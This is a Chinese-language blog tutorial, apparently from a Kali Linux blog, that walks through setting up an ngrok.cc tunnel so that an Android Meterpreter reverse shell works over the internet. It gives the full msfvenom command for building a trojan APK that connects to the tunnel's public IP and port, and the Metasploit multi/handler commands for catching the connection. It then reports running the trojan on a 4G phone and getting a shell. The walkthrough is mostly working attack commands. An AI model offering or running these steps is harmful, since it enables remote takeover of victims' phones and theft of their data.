发布于2022年11月4日3年前 配置外网环境我这里用的是http://www.ngrok.cc其他的自行试用 这个可以免费 。远程端口随便填(反正你填啥都会提示你端口已被使用:)) 本地端口填写你的kali ip地址 也就是攻击机的地址 端口随意 不懂4444即可!填写完后效果如下:然后点击开通下载客户端根据你kali的版本下载我的是64位的。运行客户端先看看你的clientid在隧道管理——隧道ip中查看,如图:记录好id后,运行下面命令./sunny clientid 你的id查看外网的ip我们ping下赠送域名的ip地址得到ip地址制作外网shellmsfvenom -p android/meterpreter/reverse_tcp LHOST=外网ip LPORT=外网端口 R > 666.apk**ps:**外网ip就是刚才ping出来的域名的ip地址,外网端口,就是你在添加隧道的时候,设置的端口。生成之后,配置msfmsfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 内网ip set LPORT 内网端口 exploit填坑:生成木马的时候,用的是外网ip和端口。配置msf的时候,我们用内网的ip和端口(很重要)完成后,手机连接4G网络,运行木马。成功得到shell看看手机的ip地址[dplayer url="http://js.bbskali.cn/ji.flv" pic="http://xxx.com/xxx.jpg" autoplay="true" addition="https://api.prprpr.me/dplayer/v3/bilibili?aid=55868962"/] 版权属于:逍遥子大表哥本文链接:https://blog.bbskali.cn/1308.html按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
创建帐户或登录后发表意见